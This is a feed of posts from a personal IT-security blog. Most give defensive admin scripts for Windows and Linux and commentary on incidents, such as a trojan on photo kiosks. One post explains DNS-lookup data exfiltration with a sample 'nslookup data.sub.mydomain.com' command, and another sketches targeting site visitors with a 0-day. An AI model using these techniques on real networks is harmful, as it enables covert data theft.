SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles></xml><![endif]--><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-fareast-language:EN-US;} </style><![endif]--> <br /><div class="MsoNormal">So a recent risky.biz podcast (ep 252 here; <a href="http://risky.biz/RB252">http://risky.biz/RB252</a>) prompted me to write this. </div><div class="MsoNormal">The host, Patrick Grey, Adam Boileau and later HD Moore were talking about the recent mass ownage of 30,000 workstations at Aramco, ouchies. Some of the things that were mentioned I have done before so I thought I would get them out there;</div><div class="MsoNormal"><br /></div><div class="MsoNormal">First up <b>Administrative monitoring in a Windows Domain</b>, trivially easy, should only take 15minutes at most to setup.</div><div class="MsoNormal"><br /></div><div class="MsoNormal">On one of your DC's create a group-audit.vbs file as below</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><i>'&nbsp; Rem this script will query a group<br />sLDAPPath = WScript.Arguments.Item(0)<br />'wscript.echo sLDAPPath <br />&nbsp; <br />strTargetGroupDN = "LDAP://" &amp; sLDAPPath &amp;""<br />EnumNestedgroup strTargetGroupDN<br />Function EnumNestedgroup(strGroupDN)<br />&nbsp;&nbsp;&nbsp; Set objGroup = GetObject(strGroupDN)<br />&nbsp;&nbsp;&nbsp; For Each objMember in objGroup.Members<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; If (LCase(objMember.Class) = "group") Then<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; wscript.echo objMember.AdsPath<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; EnumNestedgroup objMember.AdsPath<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; Else<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; Wscript.Echo objMember.DisplayName &amp; " ; " &amp; objMember.Mail<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; End If<br />&nbsp;&nbsp;&nbsp; Next<br />&nbsp;&nbsp;&nbsp; Set objGroup = Nothing<br />End Function</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal">Then in a batch file run the below for each group (in the CN, I suggest domain adminis, administrators, enterprise admins, schema admins and any other privleged group) you want to monitor (different log files at the end) Then just diff them at the end of the script and email (blat is your friend) if there are any differences.</div><div class="MsoNormal"><i>cscript //nologo C:\scripts\group-audit.vbs "CN=Domain Administrators,CN=Builtin,DC=DOMAIN,DC=TLD" &gt; C:\scripts\administrators.log</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Sudoers/Root group monitoring for Linux</b>;</div><div class="MsoNormal">similar to our windows script run the below depending on the groups you need to monitor then diff the results from a previous time then pipe out to email, if you don't have getent use (<i>grep ^GROUPNAME /etc/group</i>). Then just sendemail (the Linux equivalent of blat) at the end if there is an error; </div><div class="MsoNormal"><i>mv \root\logs\<i>sudoers.log \root\logs\old\</i></i></div><div class="MsoNormal"><i>mv \root\logs\<i>root.log \root\logs\old\</i></i><br /><i>getent group sudoers &gt; \root\logs\sudoers.log</i></div><div class="MsoNormal"><i>getent group root<i> &gt; \root\logs\root.log</i></i></div><div class="MsoNormal"><i><i>diff&nbsp; <i>\root\logs\sudoers.log <i>\root\logs\old\sudoers.log</i></i></i></i></div><div class="MsoNormal"><i><i><i><i><i><i>diff&nbsp; <i>\root\logs\root.log <i>\root\logs\old\root.log</i></i></i></i>&nbsp;</i></i></i></i> </div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Inactive accounts check and if your really harsh disable in windows</b>;</div><div class="MsoNormal">The 12 below is the number of weeks to look for, this is not foolproof sometimes accounts will show up that have been active more recently;</div><div class="MsoNormal"><i>dsquery user -inactive 12 -limit 0 |find /v "OU=Disabled Accounts(Good idea to have this OU)" |find /v "OU=ANY OU YOU WANT TO IGNORE" &gt; c:\scripts\inactive.txt</i></div><div class="MsoNormal"><i>rem this is the disable part remove the double % if not used in a batch script. Hope you don't have # in your usernames too :)</i></div><div class="MsoNormal"><i>for /f "delims=#" %%a in ('type c:\scripts\inactive.txt"') do (</i></div><div class="MsoNormal"><i>&nbsp; &nbsp; dsmod user %%a -disabled yes<br />&nbsp; dsmove %%a -newparent "ou=Disabled Accounts,,</i><i><i>DC=DOMAIN,DC=TLD</i>"</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>SSH monitoring for Linux</b>, Fail2Ban or Denyhosts, use one or the other, love it.</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Different local admins per computer</b>, this idea came from a colleague that worked at a big multinational who said they had this as a standard, very cool idea. This will stop viruses and worms that simply learn the local admin then propagate via admin$ shares using this wherever they can. It won't stop a committed attacker who will probably work out the system (you can increase the password length by increasing the 15 on the set final pass, heck even do a second different md5 of something). This should be put in a batch file that is then set via scheduled task to run at midnight, you can go even further and set it to run hourly extending the thedate variables;</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><i>set thedate=%date:~4,10%<br />set passphrase="PASSWORD HERE"<br />for /f %%a in ('c:\stat\md5.exe -d%computername%%passphrase%%thedate:/=-%') do Set pass=%%a<br />set finalpass=%pass:~0,15%</i></div><div class="MsoNormal"><i><br /></i></div><div class="MsoNormal"><i>net user LOCALADMIN %finalpass%</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal">Then to retrieve the computers password simply run the below batch file, obviously protect the passphrase and retrieval batchfile somehow, and if just anyone can access the script on the local pc then they can see what the password is, so lock it down with permissions;</div><div class="MsoNormal"><br /></div><div class="MsoNormal">set /p computer="Enter computer hostname: " %=%</div><div class="MsoNormal"><i>for /f %%a in ('c:\stat\md5.exe -d%computer%%passphrase%%thedate:/=-%') do Set pass=%%a<br />echo %pass:~0,15%</i></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Workstation and server hardening.</b></div><div class="MsoNormal">This is a massive topic that people have written hundreds of volumes on, but really keep all your stuff up to date and look at what lockdown stuff is in your OS, obviously easier said than done, otherwise something like 80% of breaches wouldn't occur.</div><div class="MsoNormal">For network lockdown in windows there is the windows firewall, IP filtering(Windows 2003 only), and IPsec policy that can all easily lock down ports and applications.&nbsp;</div><div class="MsoNormal">On Linux there is iptables, which is easy enough to use, see here for a quick guide http://richmorrison.net/?p=36</div><div class="MsoNormal"><br /></div><div class="MsoNormal">Generally speaking you limit the number of local admins/super users on any OS', so monitor this too. Monitor your important groups, heck on a windows workstation the below will do the trick;</div><div class="MsoNormal"><i>net localgroup administrators &gt; c:\scripts\local-admin.log</i> </div><div class="MsoNormal">then diff it from last time and alert on difference. </div><div class="MsoNormal"><br /></div><div class="MsoNormal">Av is dead, so is blacklisting. Sure keep av running to protect any systems that don't have your kick ass whitelisting enabled. Use something simple, Clam is my favorite for simple effective av, cross platform too, windows you probably need more depending on what the machine is used for and your budget. I am generally pretty loathe to put more and more agents on servers, as one will always eventually cause a crash, so they really have to add value on an immense scale for me to say ok.</div><div class="MsoNormal">For filesystem and application lockdown; in windows there is Software restriction policy (SRP) and app locker, which from my playing around looks like a gussied up version of SRP. I would suggest if you have applocker use it to whitelist a clean system then block everything else and you are pretty safe for the time being, I can't find any info on the hash applocker uses but even if it is md5 the chance that some random attacking your server/pc is going to be able to generate an exe with their payload that has a hash collision with an existing file is pretty small. Of course if you chose signed exe's then some of the more recent possible state sponsored malware that comes signed will still get you, but then you could just hash your whole clean system and be pretty damn safe.</div><div class="MsoNormal">If you are stuck on an older system with just SRP you can still hash your files, heck you can use something md5deep or sha1deep to get all the hashes you need and script creation of your rules, or just compare the hashes later as a form of poor mans tripwire.</div><div class="MsoNormal">On Linux you have apparmor and SElinux, I prefer SElinux's approach but Apparmor is much easier to configure without breaking things. It is horses for courses, but I would recommend whichever way you go, don't go with the distros rather relaxed default.&nbsp;</div><div class="MsoNormal">There are guides out there, so I am not going to reproduce them for SRP, app armour, SElinux and Apparmour, so go google. Another one I didn't mention as I have yet to have a decent play with it, is El Jefe (<a href="http://www.immunityinc.com/products-eljefe.shtml">http://www.immunityinc.com/products-eljefe.shtml</a>), which although being another agent does live processor monitoring and trending which is pretty cool.</div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b>Network segregation</b>; really that is it, segregate your servers based on what they do, limit communication between them with a firewall. Easy to do get ipcop or smoothwall if you have no cash, think does this device really need to talk to that device, if no then why can it.&nbsp;</div><div class="MsoNormal"><br /></div><div class="MsoNormal">This is all simpler said than done. But there you have it just a quick dump of protections that I have used and would recommend. Some of these you can get in with no pain, this was just meant to be a quick few scripts I have written over the years but ended up a diatribe against add-ons and a spruik of built in features... Ah well I hope it is of use to someone.</div>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-26435592633418726422012-01-19T17:55:00.000+11:002012-01-19T17:55:00.180+11:00Easy data exfiltrationI had this thought last night as I was falling to sleep, and I realise it has probably already been talked about but I will explain how easy it is to do and how hard it is for existing detections to detect.<br />So my idea is basic data exfiltration via DNS lookups. Say you are sitting on an internal machine, you logged on as a local user through some exploit via boot disk or what not. You probably don't have internet access and you can't install a tunnelling tool, you don't want to set off the local HIDS of the machine by plugging in an unknown USB stick, so what do you do?<br />Well if you already have a DNS server running on a server you control, pre-setup for something like <a href='http://analogbit.com/tcp-over-dns_howto'>DNS tunnelling</a>, or just legitimately resolving your own domains. Now your existing DNS server you need to turn on verbose logging for one of your subdomains, this is pretty easy to do on BIND or even in Windows's DNS server. Then simply encode from the local machine anyway you want, or if you can't encode it don't and just do an nslookup data.sub.mydomain.com, bear in mind the whole lookup can't be longer than 255 characters and the subdomain can be 63 characters tops, if you need to use some special characters then you will need to either encode in base32 or use some system in your head.<br /><br />Mitigation: Do your client machines really need to resolve every site, surely they are going through a proxy or application aware firewall that can do the DNS lookups for them. The issue of course with this is most networks now use DNS to resolve internal services, and usually the DNS servers that service these requests are allowed to go to the internet in some way, and the proxies or firewalls refer back to these internal DNS servers as they would also point to resources the proxies need like authentication. The only suggestion then is to more finely split your DNS server infrastructure up. Specific internal DNS servers that are allowed to do lookups to both the internal DNS servers and the wider internet, but the only device internally that is allowed to these is the proxy server. Of course depending on the way your proxy server works it may not wait for the client to be authenticated before it does a lookup so the lookups could simply be proxied through the compromised machines web browser that is connected to the proxy.Morgannoreply@blogger.com2tag:blogger.com,1999:blog-7184718389860127472.post-77023887768162392782011-02-21T22:34:00.000+11:002011-02-21T22:34:27.342+11:00Adobe and Fileopen painNot really a 100% IT security post. But Fiona had an issue with getting a particular sites print functionality to work on her Ubuntu laptop. It seemed to "print" by opening a PDF, that was secured in some fashion. Having a look at the error led no where, something like "could not open plugin". Having a look at source etc didn't give any help, there was no help page that Fiona could find on the site.<br />I resorted to trying to open the files with Windows, bam it tried to install a plugin called Openfile, I found there was a Linux version of OpenFile <a href="http://plugin.fileopen.com/all.aspx">here</a>.<br />Excellent, a Linux version I downloaded it and ran the installer shell script, it error'ed out as I had Adobe9.3 installed, the latest. Looking in the script it had a check for the version of Adobe installed, it only checks for 7 or 8, else fail. Googling led me to a recipe sites support page with posts from back in 2008 with someone complaining that Adobe 9 wasn't supported, the recipe site had started to ditch FileOpen as the support request hadn't been fixed to support Adobe9. The main reason I am posting this is to help others in this predicament.<br />It was important I get the site to work, so I assured Fiona that windows was not the answer.<br />I ran the following (as I had installed it manually from a deb from adobe just in case it was an old version issue) <i>sudo sh /opt/Adobe/Reader9/bin/UNINSTALL</i><br />Then managed to download an older version from here <a href="http://ardownload.adobe.com/pub/adobe/reader/unix/8.x/8.1.1/enu/AdobeReader_enu-8.1.1-1.i386.deb">http://ardownload.adobe.com/pub/adobe/reader/unix/8.x/8.1.1/enu/AdobeReader_enu-8.1.1-1.i386.deb</a> and installed it, then ran the OpenFile shell installer and all was good, site worked all was happy with the world.<br />Just posting this for anyone else who has the issue.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-57410978842293480512010-09-26T23:30:00.001+10:002010-09-26T23:38:32.214+10:00Definately not outage VirginsSo in case you haven't heard an international budget airline here in Australia has had a major computer issue, see <a href="http://www.smh.com.au/travel/travel-news/computer-glitch-causes-virgin-blue-delays-20100926-15s0k.html">here</a>.<br />By the sounds of it their outsourced service provider doesn't have redundant kit, as they couldn't simply fail-over. But it gets worse currently going to https://book.virginblue.com.au/FlightInfo.aspx or https://book.virginblue.com.au leaks a lot of information, and leaks a nice juicy standard ASP.Net error page, of the type that the recently discussed Asp.Net oracle padding attack can take great use of, see <a href="http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310?utm_source=Threatpost&amp;utm_medium=Tabs&amp;utm_campaign=Today%27s+Most+Popular">here</a>.<br />Ouch and double ouch. Oh and we hear this is not the first outage they have had in as many months...Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-65244435086708329702010-07-25T20:33:00.000+10:002010-07-25T20:33:02.019+10:00passive recon on valued targetsSo there was a bit of a flash in the pan recently, when my post on a simple autorun virus exploded after I notified Patrick Gray of the Risky business podcast and he blogged it, and then zdnet, Lifehacker and Slashdot (queue O'Fortuna) picked it up. I am now even listening to the risky business podcast where I get a mention.<br />Needless to say I got a lot of traffic (not a tonne, maybe the Slashdot effect is waning). A majority came from home users, interestingly a few had Firefox with java turned off, these showed up in extremetracker (used them for a while, and they still have some value obviously). Those that didn't showed up in Google analytics.<br />I am a big fan of no-script, so it seems I am not alone.<br />Before I get on to my main point I feel I need to argue some points. <br />First Lifehacker seemed to allude to the USB key either being infected from my home system or in some other way. This is simply untrue. This is a windows virus, thus a windows binary, simply won't run on Linux so no way to get infected there, and that was the last system it was plugged into and everything on it deleted to make way for the small collection of photos. The other point is the investigation I did, our receipt showed a time of 2:35pm (already gave the Job number to BigW for their investigation team), the virus folders creation time (and the files inside) was 2:24pm on the same day as the receipt.<br />On to the main point.<br />Of the total ~2000 hits, there were some interesting and funny hits. There was the obligatory hits from Woolworths, BigW’s parent company, then funny from Coles (there biggest competitor) and Kodak (the kiosks are Fujifilm). Then came the interesting, obviously driven from the Slashdot post. Some hits from government organisations, some from big military complexes and security agencies the world over.<br />The point of this post is to point out what kind of information these different public and private companies exposed. Obviously first off the bat, and something I thought of but my Boss put eloquently into words “Why do so many of these organisations have such telling reverse DNS records or ip block records”, why indeed. I am not going to name names, but using the ones I have already named. Woolworths, their block was registered to Woolworths Limited.<br />The next point that concerns me more is the other data that leaked out, I have their external IP, ok that’s not really much, but their browser version (a lot of IE6 out there people have you learned nothing from the Google breach), their connection speed, OS, etc etc. This could lead to someone simply writing a decent tech article, getting Slashdotted, then getting a list of targets stream in, do a bit of Google digging find an employee in said companies email address/linked-in/Facebook and send them an email to a follow up post with a nice 0-day with remote code to install your custom malware, some good reconnaissance on the most valuable (techies) targets. Usually you can assume the techies are running the latest software in the company, so if you see ie6 you have hit pay dirt, if you see Mozilla 1.0 woo. You can even look for outdated OSes with un-patched vulnerabilities; there were a couple Windows98, Windows2000. Oh and to that 0S2/warp4 user that hit the site (if it wasn’t forged) both my apologies and respect...<br />So from this I would think maybe everyone should change their proxies to use a different IP out of their block that is not registered to their company name, no reverse DNS, and you know update your browser and OS once in a while, or change what your browser reports itself as to a different browser.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com1tag:blogger.com,1999:blog-7184718389860127472.post-92059607008978597442010-07-04T18:43:00.003+10:002010-07-06T13:22:24.292+10:00Big WirusGather round everyone for a tale of woe.<br />So I loaned one of my many USB keys to Fiona to backup some of our photos to print at a BigW, Mt Gravatt to be precise. I had cleared everything off and handed it over to her to copy over the photos. We tried it in a local BigW (Mt Ommaney) on Saturday but couldn't find a station that worked properly, we managed to get a few photos printed, but Fiona kept the key to see if she could get them printed elsewhere.<br />Off she trotted to Mt Gravatt BigW on Monday after she dropped the kids at kindy, she printed out the photos and thought nothing of it. Wednesday night I decided I should move my files back, I plugged the USB key in and noticed among the photos a hiden autorun.inf... Not usual for me to have leave that there, a quick read of it in text editor let me see it was trying to run RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\driver.exe scanning the file with clamwin let me know it was <a href="http://xml.ssdsandbox.net/index.php/78faaa98f49d3a2bb3c4030376b00673">Trojan.Poison-36</a> (it goes by other names, trojan.killav is Symantecs name) a nasty little phone home trojan that was only discovered recently (9/06/10), that uses the usual trick of infecting attached drives with the autorun.inf trick. It also then goes on to try and kill av programs and then once that is done download other malware, see <a href="http://www.bitdefender.com/VIRUS-1000499-en--Trojan.KillAV.PT.html">here</a><br />I was safe due to my self inflicted draconian software restriction policy, and Fiona who had plugged it in to her laptop was safe due to it being an exe and her running Linux.<br />So I notified BigW back on the 30th, I think for something so little, I have given them reasonable disclosure. It is something they could have designed against, by using a software restriction policy, or simply making the USB devices read only via policy, or hey you know Antivirus that at least occasionally gets updated...<br />I was and still am tempted to put my own little exe and autorun on a key to see if the kiosks are still vulnerable, but Fiona has advised against it, my little voice of reason.<br />My problem with this issue, is that there seems to be little design that has gone into a system that thousands of people probably use a week, and little concern for users of these systems, how many people are going to get home and infect their systems, how many are going to not realise it was due to the dodgy kiosk they used and then blame the internert, Microsoft, or their kids. I am not a big fan of misplaced blame.<br /><br />Not really much news here, viruses are a part of life. But with most modern USB keys no longer having the nice little feature of a read only switch, there is little you can do to protect yourself. You could try having an autorun.inf on your key that is marked read only, that may work unless the virus knows how to overwrite it.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com8tag:blogger.com,1999:blog-7184718389860127472.post-81602787823031903502010-04-27T18:29:00.002+10:002010-04-27T18:29:00.365+10:00securityI am the first to admit I am a sad geek. When I saw this the other day it made me laugh, possibly a little too much; <a href="http://abstrusegoose.com/262">http://abstrusegoose.com/262</a><br />What follows is a computer security debate on a fictional character in a fictional universe, I apologise in advance. <br />Now I have to debate this. I always thought of R2D2 as the ultimate in automated hacking. AI that is constantly writing vulnerabilities, heck he probably has a virtual Imperial System running in his hardware to throw test code at. That and he had physical access to a data port, ala USB, so he may have known some nice little direct memory injections or even a kind of side channel attack if the system was one big computer (which it seems to be) he could have been detecting key inputs from other terminals via power fluctuations in the data port. <br />If it was a network, he could have known some protocol vulnerability or remote code exec that the good old pompous "no one will be able to get to that vulnerable access port on our space station" Empire would not bother patching, can you imagine the amount of patching the empire would have to do though.<br /><br />If we take the monolithic single computer per vessel approach (which leaves no room for redundancy) you have at its peak 25000 Star Destroyers, 12 Super star destroyers and around 3 million other vessels (tie fighters, Corvettes, Gunships, Transports, and the Death Star). So let’s say 3 million huge computers, that probably can't be patched while in service, so will only be patched when in for maintenance at a dock, leaving lots of time for Vulnerabilities to be discovered, and vulnerabilities on a non-segregated duty single monolithic computer would be awesome, initiate self destruct anyone?<br /><br />If we take the multi-computer networked approach (which seems more likely with what we know that the hyper drive computer needed time to spin up and that droids seem independent). A Star Destroyer had about 5000 members in its crew, and the Super Star Destroyer and Death Star about 300,000 crew, we will say the smaller craft had an average of 10 crew (tie fighters, Corvettes, Gunships, and Transports). So that means a total number of service men and women of about 160million, they probably work 3 8 hour shifts a day plus some to cover weekends, so maybe a quarter of those have actual workstations, but there would be servers and central computers, so say 80million computers, plus about 10million network devices near on impossible to have 100% patch rollout on a network of that size, give someone physical access to that network and they will get in somewhere, especially if that someone is a precocious little blue and white droid.<br /><br />Sources; <a href="http://starwars.wikia.com/">http://starwars.wikia.com</a>Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-18858364857626383672010-04-15T22:31:00.000+10:002010-04-15T22:31:26.421+10:00Altassian and Apache are related?A very good write up of the impressive attack that was carried out on these two groups; <a href="http://www.zdnet.com.au/hackers-use-atlassian-to-compromise-apache-339302448.htm">http://www.zdnet.com.au/hackers-use-atlassian-to-compromise-apache-339302448.htm</a><br />It is good that this underlines the real power of an XSS, I have heard people dismiss XSS and this will be good to pull out at times like that. But it wasn't just XSS it was a co-ordinated multi-pronged attack. Work of real pro's. Just goes to show if someone wants in badly enough they will get in.<br />I know some of the people at Altassian and I would say that unfortunately they got attacked by a better opponent. No one is infallible. It is good though how Altassian handled it then how Apache handled the resultant attack. I would say Altassian was the target because of the donation to Apache, it made them a target.<br /><br />Oh yeah and I have said it before and I will say it again, I hate URL shortening services they should all die in a fire, if twitter wants to stick to the 140 characters (which is a good thing) move to putting URL's in the page as a simple html link that goes at the bottom ala the way Facebook does it.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-20184744334605295122010-02-09T18:38:00.011+11:002010-02-09T18:38:00.687+11:00A bleak but bright futureSo listening to <a href="http://risky.biz/RB138">Dan Gear on the Risky Business podcast </a> talk about the possible future of computing today while flicking through my RSS feed. I came to a realisation.<br />The future of computing is going to be bleak. But maybe good for our security.<br />Dan was talking about the new iPad and existing single purpose devices as being the new wave of computers. Think about it a device that is so locked down and vendor locked in that it is inherently secure due to that. Devices that are single purpose, they don't and can't do everything your previous computer could, think about it a light and switch doesn't require updates or security patches. Its purpose is singular, provide light or not.<br />These computers would do this as well, provide a game, information, or what have you. We are already here to some extent, single purpose computers plugged into or inside televisions, locked down to the way the vendor wants, not necessarily locked down enough but regardless. They still have bugs, ways to circumvent the original intended operation, but generally speaking these bugs require the inclined to be in front of the device, not miles away in their parents basement.<br />Then while listening to this and pondering I read another article about "Cloud computing".<br />So the future will be these big provided clouds, some to play games in, some for businesses, others for research and development. Single purpose environments abstracted away from even the technical users. Who will use a single purpose thin client to access these clouds. <br />So on one front it sounds good, security and technicalities are abstracted away to an extent. On another front it means tinkering will be harder, with everything, technical people will actually be less technical than they are now, it will be a dumbing down all around.<br />I have played with Amazon's elastic compute cloud, Google app engine, and run a personal virtual server on my laptop and media centre as well as running several different ones in production so I can see the advantage for the moment, but they can pry my multi-purpose machines from cold dead hands when the time comes.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-91626258757309033252009-12-14T18:32:00.001+11:002012-07-11T17:39:50.739+10:00Linux secure?Oh my, read this; http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html<br />Of course this is just the beginning, I saw this in the early days of windows, popularity means people want flashy yet lame screensavers so they go a hunting, see a banner ad that is flashing epileptically at the user that tells them their search is over, they click it and install a new theme for their cursor (I hate these), a day of the month screen saver, or a fancy toolbar which will let you know who is browsing your MyFaceTwitLinked page at any given time, and also automatically installs thousands of other applications you may like, hiding in these are some nice little bots. Of course on install it asks them for their password as it has to make system changes, it then puts a helper in roots cron and makes a new init.d daemon to keep it memory resident and its privledges elevated, heck maybe it even recompiles some binary that is used frequently with elevated privledges that checks all that other stuff is still good to go, something like the logserver or init<br />Then we Linux will have reached the popularity of windows, the weakest link will again be the user.<br />So in my humourous little story above I am trying to point out just cause it is safe now won't mean it will be forever. Windows is less and less about Worms that automatically get in without user intervention. Conficker was the last big one and MS had a patch out before it hit, so it was only slow patching that really let it spread. The rest of the viruses that are seen are delivered along with innocuous looking software, or at worst a drive by download that means a page is running something in the background that takes advantage of a hole in internet explorer to install something, these drive by downloads won't happen. But have a look at the top 15 http://www.net-security.org/secworld.php?id=8597 most common attacks and you will see Linux and Macs are susceptable to the lot, through misconfiguration or user error.<br />Don't get me wrong I am a big Linux fan-boi. If I had it my way Windows would be the struggling niche, Linux would have 96% market share, BSD 2% and macs wouldn't exist :P I think the ideal behind linux is very admirrable and scientific. Linux builds on what has come before it (usually) and because what has come before is open and readable this is fairly easy. "If I have seen further, it is by standing on the shoulders of giants." Sir Isaac Newton. To not build on what has come before is to repeat your predecessors mistakes.<br />There will always be flaws, till we write code that can write its own code it may eventually create something almost flawless, or one of its children will.<br />I think Linux allows for greater security, but also greater insecurity. Security is not where open sources power lies, it is its flexability.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com2tag:blogger.com,1999:blog-7184718389860127472.post-74105657292787080922009-11-17T21:50:00.004+11:002009-11-17T22:17:19.005+11:00Rickrolling has gone viral againNow this <a href="http://www.smh.com.au/technology/security/rickrolling-iphone-hacker-ashley-worm-or-boy-wonder-20091113-id2g.html">story</a> interests me on so many levels. <br />It has put Wollongong on the map again people. I'll admit I was raised in the Gong, so it is good to see someone even making notoriety that is from Wollongong. The last renowned intelligent export we had was Evelyn Owen or Sir Lawrence Hargrave (1939 and 1915 respectively) so it has been some time between.<br />I also dislike apple, there practices annoy me; there practice of dumbing down everything even the extremely technical is the same as dropping superfluous words from the English language to make it easier for speakers, we only need one word for cold right? They also stand on the shoulders of giants, yet give little recognition to those. Yes they made Unix "usable" (so did Linux without the pompousness), but try and find their references of gratitude to all their stolen code, or stolen ideas, nope. Apple have fallen down in the security world repeatedly, and this is a glaring example who sets the same password on every device when you can assume with pretty high certainty that people are going to attack it and find out your password, hence the unlocking.<br />The other reasons this is interesting is it is a virus that Rickrolls people, hilarious. Rickrolling is something I have done, and had done to me a fair few times, it almost always makes me smile. The other humorous point of this is the author is Ashley Towns, so the meme of Rick Astley is almost made for him.<br />Well if you own an iphone (hisss) then you can secure it against this virus <a href="http://www.redmondpie.com/how-to-secure-your-jailbroken-iphone-from-ssh-hack-9140084/">here</a>(a simple passwd to fix it), bear in mind that this virus will probably hang around for a few years like code red and slammer, funny stuff.Morgan 